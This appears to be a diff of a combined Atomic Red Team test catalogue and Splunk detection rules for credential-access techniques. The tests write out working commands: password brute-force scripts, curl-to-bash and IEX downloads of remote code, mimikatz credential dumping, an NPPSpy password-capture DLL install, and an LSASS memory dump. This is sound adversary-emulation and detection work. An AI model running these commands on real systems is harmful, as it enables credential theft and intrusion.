ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", - "cd \\..\\ExternalPayloads\n.\\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\\bruteuser.txt TestUser1 \n", + "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\\bruteuser.txt TestUser1 \n", "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n", "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n" ], @@ -107702,7 +108212,7 @@ "executor": { "name": "powershell", "elevation_required": false, - "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n" + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path \"#{passwords_path}\"\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n" } }, { @@ -107761,19 +108271,19 @@ "dependencies": [ { "description": "kerbrute.exe must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"\n" }, { "description": "bruteuser.txt must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\bruteuser.txt){exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteuser.txt\"\n" + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteuser.txt\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteuser.txt\"\n" } ], "executor": { "name": "powershell", "elevation_required": false, - "command": "cd PathToAtomicsFolder\\..\\ExternalPayloads\n.\\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n" + "command": "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n" } }, { @@ -108505,7 +109015,7 @@ { "name": "Azure AD High Number Of Failed Authentications From Ip", "description": "The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 5 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection.", - "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) as userPrincipalName by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD High Number Of Failed Authentications From Ip", "analytic_story": [ @@ -108601,7 +109111,7 @@ { "name": "Azure AD Successful Authentication From Different Ips", "description": "The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.", - "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", + "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) as ipAddress values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", "tags": { "name": "Azure AD Successful Authentication From Different Ips", "analytic_story": [ @@ -109400,8 +109910,8 @@ "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", - "\\..\\ExternalPayloads\\gsecdump.exe -a\n", - "Copy-Item \"PathToAtomicsFolder\\ExternalPayloads\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "\"\\..\\ExternalPayloads\\gsecdump.exe\" -a\n", + "Copy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", "C:\\Windows\\System32\\inetsrv\\appcmd.exe list apppool /@t:*\nC:\\Windows\\System32\\inetsrv\\appcmd.exe list apppool /@text:*\nC:\\Windows\\System32\\inetsrv\\appcmd.exe list apppool /text:*", "C:\\Windows\\System32\\inetsrv\\appcmd.exe list apppool /config", @@ -111390,12 +111900,12 @@ "dependencies": [ { "description": "Gsecdump must exist on disk at specified location (#{gsecdump_exe})\n", - "prereq_command": "if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{gsecdump_exe}\") {exit 0} else {exit 1}\n", "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$parentpath = Split-Path \"#{gsecdump_exe}\"; $binpath = \"$parentpath\\gsecdump-v2b5.exe\"\nIEX(IWR \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\" -UseBasicParsing)\nif(Invoke-WebRequestVerifyHash \"#{gsecdump_url}\" \"$binpath\" #{gsecdump_bin_hash}){\n Move-Item $binpath \"#{gsecdump_exe}\"\n}\n" } ], "executor": { - "command": "#{gsecdump_exe} -a\n", + "command": "\"#{gsecdump_exe}\" -a\n", "name": "command_prompt", "elevation_required": true } @@ -111416,7 +111926,7 @@ } ], "executor": { - "command": "Copy-Item \"PathToAtomicsFolder\\ExternalPayloads\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "command": "Copy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", "cleanup_command": "$cleanupPath = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER \n$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''\nSet-ItemProperty -Path $cleanupPath.PSPath -Name \"PROVIDERORDER\" -Value $cleanupUpdatedValue\nRemove-Item -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\" -Recurse -ErrorAction Ignore\nRemove-Item C:\\NPPSpy.txt -ErrorAction Ignore\nRemove-Item C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore", "name": "powershell", "elevation_required": true @@ -113536,7 +114046,7 @@ { "name": "Attempted Credential Dump From Registry via Reg exe", "description": "Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\System* OR Processes.process=*HKLM\\\\Security* OR Processes.process=*HKLM\\\\System* OR Processes.process=*HKLM\\\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\System* OR Processes.process=*HKLM\\\\Security* OR Processes.process=*HKLM\\\\System* OR Processes.process=*HKLM\\\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`", "tags": { "name": "Attempted Credential Dump From Registry via Reg exe", "analytic_story": [ @@ -113753,7 +114263,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "$process_name$ was identified on endpoint $Computer$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager.", + "message": "$process_name$ was identified on endpoint $dest$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -113763,32 +114273,11 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "TargetFilename", - "type": "File Name", - "role": [ - "Victim" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 80, @@ -113960,7 +114449,7 @@ { "name": "Creation of Shadow Copy with wmic and powershell", "description": "This search detects the use of wmic and Powershell to create a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`", "tags": { "name": "Creation of Shadow Copy with wmic and powershell", "analytic_story": [ @@ -113997,20 +114486,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -114062,7 +114537,7 @@ { "name": "Credential Dumping via Copy Command from Shadow Copy", "description": "This search detects credential dumping using copy command from a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\\\system32\\\\config\\\\sam* OR Processes.process=*\\\\system32\\\\config\\\\security* OR Processes.process=*\\\\system32\\\\config\\\\system* OR Processes.process=*\\\\windows\\\\ntds\\\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter` ", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\\\system32\\\\config\\\\sam* OR Processes.process=*\\\\system32\\\\config\\\\security* OR Processes.process=*\\\\system32\\\\config\\\\system* OR Processes.process=*\\\\windows\\\\ntds\\\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter` ", "tags": { "name": "Credential Dumping via Copy Command from Shadow Copy", "analytic_story": [ @@ -114097,20 +114572,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -114162,7 +114623,7 @@ { "name": "Credential Dumping via Symlink to Shadow Copy", "description": "This search detects the creation of a symlink to a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`", "tags": { "name": "Credential Dumping via Symlink to Shadow Copy", "analytic_story": [ @@ -114197,20 +114658,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -114275,7 +114722,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $user$.", + "message": "PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $User$.", "mitre_attack_id": [ "T1003.002", "T1003" @@ -114285,7 +114732,7 @@ ], "observable": [ { - "name": "user", + "name": "User", "type": "User", "role": [ "Victim" @@ -114356,7 +114803,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The $source_image$ has attempted access to read $TargetImage$ was identified on endpoint $Computer$, this is indicative of credential dumping and should be investigated.", + "message": "The $source_image$ has attempted access to read $TargetImage$ was identified on endpoint $dest$, this is indicative of credential dumping and should be investigated.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -114366,14 +114813,7 @@ ], "observable": [ { - "name": "source_image", - "type": "Other", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -114598,7 +115038,7 @@ { "name": "Dump LSASS via comsvcs DLL", "description": "The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries. Specifically, it targets the exploitation of the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. Threat actors can use the comsvcs.dll to exploit this process and obtain valuable credentials. The analytic identifies instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump, indicating potential LSASS dumping attempts. This tactic is often part of more extensive attack campaigns and is associated with numerous threat groups. Identifying this behavior is crucial for security operations center (SOC) analysts, as credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. It is important to note that no legitimate use of this technique has been identified so far. The impact of the attack, if a true positive is found, can be severe. Attackers can use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. To implement this analytic, ensure that logs with process information are ingested from your endpoints. However, be aware of potential false positives, as legitimate uses of the LSASS process may cause benign activities to be flagged. Upon triage, review the processes involved in the LSASS dumping attempt, capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. By identifying and mitigating LSASS exploitation attempts early on, SOC analysts can better protect their organization's assets and prevent potential breaches.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`", "tags": { "name": "Dump LSASS via comsvcs DLL", "analytic_story": [ @@ -114611,7 +115051,8 @@ "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", - "Volt Typhoon" + "Volt Typhoon", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -114726,7 +115167,7 @@ { "name": "Dump LSASS via procdump", "description": "Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\\\nDuring triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`", "tags": { "name": "Dump LSASS via procdump", "analytic_story": [ @@ -114847,7 +115288,7 @@ { "name": "Enable WDigest UseLogonCredential Registry", "description": "This analytic is to detect a suspicious registry modification to enable plain text credential feature of windows. This technique was used by several malware and also by mimikatz to be able to dumpe the a plain text credential to the compromised or target host. This TTP is really a good indicator that someone wants to dump the crendential of the host so it must be a good pivot for credential dumping techniques.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\System\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\\\\*\" Registry.registry_value_name = \"UseLogonCredential\" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\System\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest\\\\*\" Registry.registry_value_name = \"UseLogonCredential\" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter`", "tags": { "name": "Enable WDigest UseLogonCredential Registry", "analytic_story": [ @@ -116045,7 +116486,8 @@ "Credential Dumping", "CISA AA22-320A", "Sandworm Tools", - "Volt Typhoon" + "Volt Typhoon", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -116070,7 +116512,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -116119,7 +116561,7 @@ { "name": "Windows Non-System Account Targeting Lsass", "description": "The following analytic identifies non SYSTEM accounts requesting access to lsass.exe. This behavior may be related to credential dumping or applications requiring access to credentials. Triaging this event will require understanding the GrantedAccess from the SourceImage. In 